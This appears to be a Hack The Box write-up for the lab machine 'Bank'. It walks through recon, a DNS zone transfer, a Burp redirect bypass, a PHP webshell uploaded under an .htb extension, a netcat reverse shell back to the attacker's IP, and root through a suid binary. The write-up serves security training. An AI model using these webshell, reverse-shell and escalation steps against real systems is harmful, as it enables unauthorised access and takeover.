Details
This machine is Bank from Hack The Box
Recon Phase
Some service discovery
root@kali:~# nmap -sV -p- -T4 10.10.10.29
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 11:08 EDT
Nmap scan report for 10.10.10.29
Host is up (0.056s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.87 seconds
User Hunting
Port 53 caught my attention so I tried a zone transfer
root@kali:~# dig axfr 10.10.10.29 @10.10.10.29
; <<>> DiG 9.11.5-P4-5.1-Debian <<>> axfr 10.10.10.29 @10.10.10.29
;; global options: +cmd
; Transfer failed.
Without knowledge of the domain I couldn't get much, so I tried bank.htb
root@kali:~# echo "10.10.10.29 bank.htb" >> /etc/hosts
Then tested the web server on http://10.10.10.29/
So I tried it as bank.htb
So it makes a difference, I'll try dig on this then
root@kali:~# dig axfr bank.htb @10.10.10.29
; <<>> DiG 9.11.5-P4-5.1-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb. 604800 IN NS ns.bank.htb.
bank.htb. 604800 IN A 10.10.10.29
ns.bank.htb. 604800 IN A 10.10.10.29
www.bank.htb. 604800 IN CNAME bank.htb.
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 31 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Sun Jul 07 11:21:53 EDT 2019
;; XFR size: 6 records (messages 1, bytes 171)
So I now have
chris.bank.htb
So I add it
root@kali:~# echo "10.10.10.29 chris.bank.htb" >> /etc/hosts
Off to http://chris.bank.htb/
I focus on bank.htb as it seems the most interesting, so I setup dirbuster
The 302s were weird, they had large sizes, so I fired up burp and tested it on http://bank.htb/index.php, intercepting the response
There the page is in the response, so I test bank.htb/support.php
So I want to avoid the redirect, so I trigger it in burp again
I remove the location header and change the code to
200 OK
From the source I know I can upload files with the extension .htb and have them treated as php, so I take a php webshell and rename it to have the .htb extension
And open a listener
root@kali:~# nc -nlvp 4444
Trigger the backdoor at http://bank.htb/uploads/simple-backdoor.htb?cmd=nc%2010.10.14.35%204444%20-e%20/bin/bash
connect to [10.10.14.35] from (UNKNOWN) [10.10.10.29] 54028
So I have a shell
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Upgrade it
python -c "import pty;pty.spawn('/bin/bash')"
www-data@bank:/var/www/bank/uploads$
Look for suid binaries
www-data@bank:/var/www/bank/uploads$ find / -perm -u=s 2>/dev/null
/var/htb/bin/emergency
[SNIP]
That is interesting
www-data@bank:/var/www/bank/uploads$ cd /var/htb
www-data@bank:/var/htb$ ls -la
drwxr-xr-x 3 root root 4096 Jun 14 2017 .
drwxr-xr-x 14 root root 4096 May 29 2017 ..
drwxr-xr-x 2 root root 4096 Jun 14 2017 bin
-rwxr-xr-x 1 root root 356 Jun 14 2017 emergency
www-data@bank:/var/htb$ cd bin
www-data@bank:/var/htb/bin$ ls -la
drwxr-xr-x 2 root root 4096 Jun 14 2017 .
drwxr-xr-x 3 root root 4096 Jun 14 2017 ..
-rwsr-xr-x 1 root root 112204 Jun 14 2017 emergency
It is suid root, so I try running it
www-data@bank:/var/htb/bin$ ./emergency
#
It seemed to have just handed me a shell
# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
And it is root
# cd /home
# ls -la
drwxr-xr-x 3 root root 4096 May 28 2017 .
drwxr-xr-x 22 root root 4096 Dec 24 2017 ..
drwxr-xr-x 3 chris chris 4096 Jun 14 2017 chris
# cd chris
# cat user.txt
[REDACTED]
# cd /root
# cat root.txt
[REDACTED]